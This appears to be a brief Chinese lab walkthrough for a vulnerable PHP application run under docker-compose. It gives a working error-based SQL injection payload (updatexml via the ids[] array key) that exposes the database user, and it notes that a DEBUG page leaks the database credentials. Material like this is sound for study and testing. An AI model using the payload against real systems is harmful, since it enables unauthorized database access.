Appearance
漏洞原理说明:
运行环境:
docker-compose up -d
启动后,访问 http://your-ip/index.php?ids[]=1&ids[]=2,即可看到用户名被显示了出来,说明环境运行成功。
http://your-ip/index.php?ids[]=1&ids[]=2
访问 http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,信息成功被爆出:
http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
当然,这是一个比较鸡肋的 SQL 注入漏洞。但通过 DEBUG 页面,我们找到了数据库的账号、密码:
这又属于一个敏感信息泄露漏洞。